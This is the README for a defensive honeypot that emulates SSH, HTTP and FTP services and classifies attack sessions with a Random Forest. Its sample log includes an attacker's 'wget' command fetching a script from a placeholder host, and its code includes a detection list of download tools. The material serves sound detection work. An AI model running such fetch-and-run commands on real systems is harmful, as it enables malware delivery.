A medium-interaction honeypot that emulates SSH, HTTP, and FTP services, logs all interactions to a structured database, and classifies attack sessions using a trained Random Forest model. Designed for deployment on a VPS or internal network segment to gather actionable threat intelligence.
- SSH honeypot using paramiko with full protocol-level emulation and fake shell
- HTTP honeypot with configurable fake pages (login forms, admin panels, WordPress)
- FTP honeypot with fake directory listings and file traps
- ML classification of attack sessions: brute force, reconnaissance, exploit attempts, malware delivery, lateral movement
- Rate limiting per source IP with configurable thresholds
- GeoIP enrichment for source IP geolocation
- Webhook alerts for high-severity attacks (Slack, Discord, generic)
- Flask dashboard with real-time stats, attack timeline, and classification breakdown
- Structured logging to SQLite + JSONL for offline analysis
- Fully typed codebase with comprehensive test suite
```
Internet
   │
   ├──▶ [SSH  :2222 (paramiko)] ──┐
   ├──▶ [HTTP :8080 (socket)]   ──┼──▶ Rate Limiter ──▶ Logger ──▶ Classifier ──▶ Alerter
   └──▶ [FTP  :2121 (socket)]   ──┘                   (SQLite)   (RF model)    (webhook)
                                                          │
                                                 Dashboard (Flask :5000)
```
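To make the Logger → Classifier stage concrete, here is an added example (not the project's own code) that rebuilds per-session features from a constructed JSONL log and labels each session; a threshold rule stands in for the trained Random Forest and covers only three of the project's five classes. The log field names and the functions `build_features`, `rule_classify` and `classify_log` are assumptions for this example.

```python
import json
from collections import defaultdict
# Constructed JSONL session log, one event per line. Field names are an assumption
# made for this example; they are not the project's real logging schema.
SAMPLE_JSONL = """\
{"session": "s1", "ts": 0.0, "event": "auth", "user": "root", "ok": false}
{"session": "s1", "ts": 0.4, "event": "auth", "user": "admin", "ok": false}
{"session": "s1", "ts": 0.9, "event": "auth", "user": "test", "ok": false}
{"session": "s2", "ts": 5.0, "event": "auth", "user": "root", "ok": true}
{"session": "s2", "ts": 7.5, "event": "cmd", "cmd": "wget http://example.invalid/x.sh"}
{"session": "s3", "ts": 9.0, "event": "request", "path": "/wp-login.php"}
{"session": "s3", "ts": 9.1, "event": "request", "path": "/.env"}
{"session": "s3", "ts": 9.2, "event": "request", "path": "/phpmyadmin"}
"""

FETCH_TOOLS = ("wget ", "curl ", "tftp ")  # download tools seen in fake-shell commands

def build_features(events):
    """Turn one session's events into the numeric vector a session classifier consumes."""
    ts = [e["ts"] for e in events]
    auths = [e for e in events if e["event"] == "auth"]
    cmds = [e["cmd"] for e in events if e["event"] == "cmd"]
    paths = {e["path"] for e in events if e["event"] == "request"}
    return {
        "duration": max(ts) - min(ts),
        "auth_attempts": len(auths),
        "auth_failures": sum(not e["ok"] for e in auths),
        "unique_users": len({e["user"] for e in auths}),
        "command_count": len(cmds),
        "fetch_commands": sum(c.startswith(FETCH_TOOLS) for c in cmds),
        "unique_paths": len(paths),
    }

def rule_classify(f):
    """Threshold stand-in for the trained Random Forest; covers three of the project's labels."""
    if f["fetch_commands"] > 0:
        return "malware_delivery"
    if f["auth_attempts"] >= 3 and f["auth_failures"] == f["auth_attempts"]:
        return "brute_force"
    if f["unique_paths"] >= 3 and f["command_count"] == 0:
        return "reconnaissance"
    return "unclassified"

def classify_log(jsonl_text):
    """Group events by session id and return {session_id: label}."""
    sessions = defaultdict(list)
    for line in filter(None, jsonl_text.splitlines()):
        ev = json.loads(line)
        sessions[ev["session"]].append(ev)
    return {sid: rule_classify(build_features(evs)) for sid, evs in sessions.items()}
```

In the real pipeline the dict returned by `build_features` is the row handed to the Random Forest; the rule function only illustrates which features separate the classes.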
```bash
git clone https://github.com/yourusername/honeypot-attack-classifier.git
cd honeypot-attack-classifier
pip install -e ".[dev]"

# generate SSH host key
ssh-keygen -t rsa -b 2048 -f honeypot/keys/host_rsa_key -N ""

# train classifier (uses synthetic data for demo)
python -m honeypot.train --synthetic --samples 1000

# start the honeypot
python -m honeypot --ssh-port 2222 --http-port 8080 --ftp-port 2121

# view dashboard
python -m honeypot.dashboard
# open http://localhost:5000
```

```bash
docker compose up -d

# view logs
docker compose logs -f honeypot
# dashboard at http://localhost:5000
```

Edit config.yaml for ports, fake credentials, rate limits, alerting webhooks, and classifier thresholds. See config.yaml for full documentation of each setting.
```bash
pytest
pytest --cov=honeypot --cov-report=term-missing
```

```
├── honeypot/
│   ├── __init__.py
│   ├── __main__.py          # Entry point
│   ├── exceptions.py        # Custom exceptions
│   ├── models.py            # Data classes
│   ├── config.py            # Configuration loader
│   ├── services/
│   │   ├── __init__.py
│   │   ├── ssh_server.py    # Paramiko SSH honeypot
│   │   ├── http_server.py   # HTTP honeypot
│   │   └── ftp_server.py    # FTP honeypot
│   ├── logger_module.py     # SQLite + JSONL logging
│   ├── rate_limiter.py      # Per-IP rate limiting
│   ├── feature_builder.py   # Session feature extraction
│   ├── classifier.py        # ML attack classifier
│   ├── alerter.py           # Webhook alerting
│   ├── train.py             # Model training CLI
│   ├── dashboard.py         # Flask dashboard
│   └── keys/                # SSH host keys
├── tests/
├── templates/
├── config.yaml
├── pyproject.toml
├── Dockerfile
├── docker-compose.yml
└── .github/workflows/ci.yml
```
For authorized security research and education only. Deploy only on networks you own or have explicit written permission to monitor. Running a honeypot without authorization may violate organizational policies or local laws.
MIT